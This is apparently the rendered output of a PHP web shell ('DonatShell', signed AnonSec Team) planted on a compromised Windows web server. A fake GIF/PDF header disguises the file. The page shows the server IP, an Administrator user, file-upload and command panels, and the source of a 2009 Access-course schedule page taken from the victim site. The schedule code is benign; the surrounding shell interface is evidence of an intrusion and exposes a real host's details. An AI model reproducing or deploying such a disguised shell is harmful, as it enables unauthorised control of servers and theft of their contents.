GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/_Archive/CST1600/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/_Archive/CST1600//Schedule_Summer.php
<?
// JimMartinson/CST1600/Schedule.php
$TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n";

ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
$thisFile=__FILE__; $thisLine=__LINE__; include('application.phpinc');
$thisFile=__FILE__; $thisLine=__LINE__; include('Course/courseInfo.phpinc');
$thisFile=__FILE__; $thisLine=__LINE__; include('classInfo.phpinc');
$title = "2009 Summer Schedule";
$headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title;
$pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title;
$pageMenu = 'Course/courseMenu.phpinc';
$thisFile = __FILE__; $thisLine=__LINE__; include('common/pageHeader.phpinc');
$thisFile=__FILE__; $thisLine=__LINE__; include('Login/authenticate.phpinc');
$sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title;
$thisFile = __FILE__; $thisLine=__LINE__; include('common/sectionHeader.phpinc');
$week = 0;
?>
<fieldset><legend><?=$title?></legend><span class="normal">
	<ol start="1">
		<!--Week 1 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Do <a href="./?StudentProfile">Assignment 1: Student Profile</a> <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+1)?>.
			<br />Do <a href="./?ClassProfile">Assignment 2: <?=$courseNumber?> Class Profile</a> <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+1)?>.
			<br />Complete <a href="Lesson1-1.php">Lesson 1-1: Creating Database Tables</a> <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+1)?>.
			<br />Complete <a href="Lesson1-2.php">Lesson 1-2: Creating Relationships between Tables</a> <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+1)?>.
		</li>
		<!--Week 2 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
      <br />Complete <a href="Lesson1-3.php">Lesson 1-3: Modifying and Managing Tables</a> <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+1)?>.
			<br />Complete <a href="Lesson1-4.php">Lesson 1-4: Performing Queries</a> <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+1)?>.
		</li>
		<!--Week 3 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Complete <a href="Lesson1-5.php">Lesson 1-5: Creating Forms</a> <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+1)?>.
			<br />Complete <a href="Lesson1-6.php">Lesson 1-6: Creating Reports and Mailing Labels</a> <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+1)?>.
		</li>
		<!--Week 4 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Complete <a href="Lesson1-7.php">Lesson 1-7: Modifying, Filtering, and Viewing Data</a> <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+2)?>.
      <br />Complete <a href="Lesson1-8.php">Lesson 1-8: Importing and Exporting Data</a> <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+1)?>.
		</li>
		<!--Week 5 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Complete <a href="Lesson2-1.php">Lesson 2-1: Advanced Tables, Relationships, Queries, and Forms</a> <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+1)?>.
			<br />Complete <a href="Lesson2-2.php">Lesson 2-2: Designing and Building Relationships and Lookup Fields</a> <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+1)?>.
		</li>
		<!--Week 6 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Complete <a href="Lesson2-3.php">Lesson 2-3: Advanced Query Techniques</a> <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+1)?>.
			<br />Complete <a href="Lesson2-4.php">Lesson 2-4: Creating and Using Custom Forms</a> <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+1)?>.
		</li>
		<!--Week 7 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Complete <a href="Lesson2-5.php">Lesson 2-5: Creating and Using Custom Reports</a> <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+1)?>.
			<br />Complete <a href="Lesson2-6.php">Lesson 2-6: Using Access Tools and Managing Objects</a> <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+1)?>.
		</li>
		<!--Week 8 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Catch up on lessons.
    </li>
		<!--Week 9 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
			<br />Catch up on lessons.
			<br />Complete the optional extra credit <a href="Lesson2-7.php">Lesson 2-7: Automating, Customizing, and Securing Access</a> <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+1)?>. <span class="attention">NOTE: This lesson is for extra credit. It is not required.</span>
			<br />Complete the optional extra credit <a href="Lesson2-8.php">Lesson 2-8: Integrating Access Data</a> <?=classDueDate($class['meetingTime'],$class['StartDate'],$week+1)?>. <span class="attention">NOTE: This lesson is for extra credit. It is not required.</span>
		</li>
		<!--Week 10 -->
		<li><? $week++; ?><?=classWeekDateCSS($class['StartDate'],$week)?>
      <br />Please complete the <a href="./?Questionnaire">course questionnaire</a> before 4:00pm on Friday, August 7th, 2009.
		</li>
	</ol>
</span></fieldset>
<?
$thisFile = __FILE__; $thisLine=__LINE__; include('common/sectionFooter.phpinc');
$thisFile = __FILE__; $thisLine=__LINE__; include('common/pageFooter.phpinc');

?>

Anon7 - 2022
AnonSec Team